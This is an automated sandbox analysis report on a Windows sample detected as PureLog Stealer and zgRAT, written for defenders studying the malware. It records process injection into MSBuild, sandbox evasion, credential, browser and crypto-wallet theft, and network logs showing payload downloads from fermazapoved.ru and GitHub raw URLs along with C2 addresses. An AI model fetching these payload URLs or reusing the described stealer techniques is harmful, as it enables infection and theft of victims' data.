Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
x7myVfh5YS.exe

Overview

General Information

Sample name:x7myVfh5YS.exe
renamed because original name is a hash value
Original sample name:1de4c3cc42232c1e3d7c09404f57b450.exe
Analysis ID:1487768
MD5:1de4c3cc42232c1e3d7c09404f57b450
SHA1:28adaa72fe927ade1b3e073de288e1b6f294d346
SHA256:131e2baac32f898ab2d7da10d8c79f546977bc1d1d585ba687387101610ed3b9
Tags:32exetrojan
Infos:

Detection

PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • x7myVfh5YS.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\x7myVfh5YS.exe" MD5: 1DE4C3CC42232C1E3D7C09404F57B450)
    • conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 4256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • Qqgmpuehc.exe (PID: 4220 cmdline: "C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe" MD5: 47DA4EB71A23802DAB374E272EAD2F78)
        • conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • MSBuild.exe (PID: 1848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2353903041.0000000005C60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_zgRATDetects zgRATditekSHen
        • 0x3d14e:$s1: file:///
        • 0x3d05c:$s2: {11111-22222-10009-11112}
        • 0x3d0de:$s3: {11111-22222-50001-00000}
        • 0x3b325:$s4: get_Module
        • 0x3b63f:$s5: Reverse
        • 0x36352:$s6: BlockCopy
        • 0x3632c:$s7: ReadByte
        • 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
        00000003.00000002.2352224373.00000000059A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          3.2.MSBuild.exe.5c60000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            3.2.MSBuild.exe.59a0000.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              3.2.MSBuild.exe.6440000.5.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                3.2.MSBuild.exe.6440000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  3.2.MSBuild.exe.6440000.5.raw.unpackMALWARE_Win_zgRATDetects zgRATditekSHen
                  • 0x3d14e:$s1: file:///
                  • 0x3d05c:$s2: {11111-22222-10009-11112}
                  • 0x3d0de:$s3: {11111-22222-50001-00000}
                  • 0x3b325:$s4: get_Module
                  • 0x3b63f:$s5: Reverse
                  • 0x36352:$s6: BlockCopy
                  • 0x3632c:$s7: ReadByte
                  • 0x3d160:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
                  Click to see the 3 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Silenttrinity Stager Msbuild Activity
                  Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 62.173.145.78, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4256, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-08-05T05:54:16.947098+0200
                  SID:2019714
                  Source Port:49708
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic
                  Timestamp:2024-08-05T05:54:15.646834+0200
                  SID:2019714
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Potentially Bad Traffic

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\d3d9.dllAvira: detection malicious, Label: HEUR/AGEN.1300671
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeReversingLabs: Detection: 24%
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeVirustotal: Detection: 41%Perma Link
                  Source: C:\Users\user\AppData\Roaming\d3d9.dllReversingLabs: Detection: 47%
                  Source: C:\Users\user\AppData\Roaming\d3d9.dllVirustotal: Detection: 60%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: x7myVfh5YS.exeVirustotal: Detection: 28%Perma Link
                  Source: x7myVfh5YS.exeReversingLabs: Detection: 28%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\d3d9.dllJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: x7myVfh5YS.exeJoe Sandbox ML: detected
                  Source: x7myVfh5YS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 62.173.145.78:443 -> 192.168.2.5:49708 version: TLS 1.2
                  Source: x7myVfh5YS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressedlBjq source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: $jq costura.dotnetzip.pdb.compressed source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: MSBuild.exe, 00000003.00000002.2357846379.00000000068C0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEECF58 FindFirstFileExW,0_2_6CEECF58
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4BB6C8 FindFirstFileExW,5_2_6C4BB6C8
                  Source: global trafficTCP traffic: 192.168.2.5:49704 -> 188.130.138.23:7702
                  Source: global trafficTCP traffic: 192.168.2.5:54809 -> 91.217.76.162:56004
                  Source: global trafficTCP traffic: 192.168.2.5:54808 -> 1.1.1.1:53
                  Source: global trafficHTTP traffic detected: GET /images/h.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /images/h.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                  Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 188.130.138.23
                  Source: global trafficHTTP traffic detected: GET /images/h.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /images/h.exe HTTP/1.1Host: fermazapoved.ruConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: 35.37.15.0.in-addr.arpa
                  Source: global trafficDNS traffic detected: DNS query: fermazapoved.ru
                  Source: global trafficDNS traffic detected: DNS query: access.samp-global.com
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fermazapoved.ru
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fermazapoved.ru/images/h.exe
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: MSBuild.exe, 00000003.00000002.2357846379.00000000068C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fermazapoved.ru
                  Source: MSBuild.exe, 00000003.00000002.2332154673.0000000002E29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fermazapoved.ru/images/h.exe
                  Source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2335934062.0000000003E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/WebDriver.dll
                  Source: MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/chromedriver.exe
                  Source: MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/testdemo345/DemoThing/raw/main/msedgedriver.exe
                  Source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: MSBuild.exe, 00000003.00000002.2352938527.0000000005A40000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: MSBuild.exe, 00000007.00000002.3278767774.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://support.mozilla.org
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: MSBuild.exe, 00000003.00000002.2335934062.0000000003EC3000.00000004.00000800.00020000.00000000.sdmp, Mgxqpwct.tmpdb.3.dr, Dmhie.tmpdb.3.dr, Ohaadlqgh.tmpdb.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://www.mozilla.org
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: Tidyi.tmpdb.3.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: unknownHTTPS traffic detected: 62.173.145.78:443 -> 192.168.2.5:49708 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, hu5jtJKG1agB7FrDKI3.cs.Net Code: z2TKaC5YIM
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.MSBuild.exe.6440000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 3.2.MSBuild.exe.6440000.5.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                  Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                  .NET source code contains very large array initializations
                  Source: 0.2.x7myVfh5YS.exe.6cefb000.2.raw.unpack, Program.csLarge array initialization: MemoryStream: array initializer size 843088
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CED8A50 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6CED8A50
                  Source: C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exeCode function: 5_2_6C4A85F0 GetModuleHandleW,NtQueryInformationProcess,5_2_6C4A85F0
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CED8A500_2_6CED8A50
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CED12100_2_6CED1210
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEF34F50_2_6CEF34F5
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CED80400_2_6CED8040
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CED10100_2_6CED1010
                  Source: C:\Users\user\Desktop\x7myVfh5YS.exeCode function: 0_2_6CEE79500_2_6CEE7950
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_012ACEC83_2_012ACEC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_012A4B283_2_012A4B28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_012A4B383_2_012A4B38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AEBA383_2_02AEBA38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE30A83_2_02AE30A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE20E83_2_02AE20E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE6E583_2_02AE6E58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE8F903_2_02AE8F90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE97603_2_02AE9760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AEB74E3_2_02AEB74E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE4D983_2_02AE4D98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE309A3_2_02AE309A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AE20D83_2_02AE20D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_02AEC7A03_2_02AEC7A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058F5D903_2_058F5D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058FA1083_2_058FA108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058F5D803_2_058F5D80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058F99193_2_058F9919
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058F99283_2_058F9928
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058FA0CF3_2_058FA0CF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058FA0F93_2_058FA0F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058FA3A93_2_058FA3A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058F9AAC3_2_058F9AAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_058FA2433_2_058FA243
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05902B3F3_2_05902B3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05902B603_2_05902B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AA15823_2_05AA1582
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AA49E83_2_05AA49E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AA26283_2_05AA2628
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_05AA18B73_2_05AA18B7
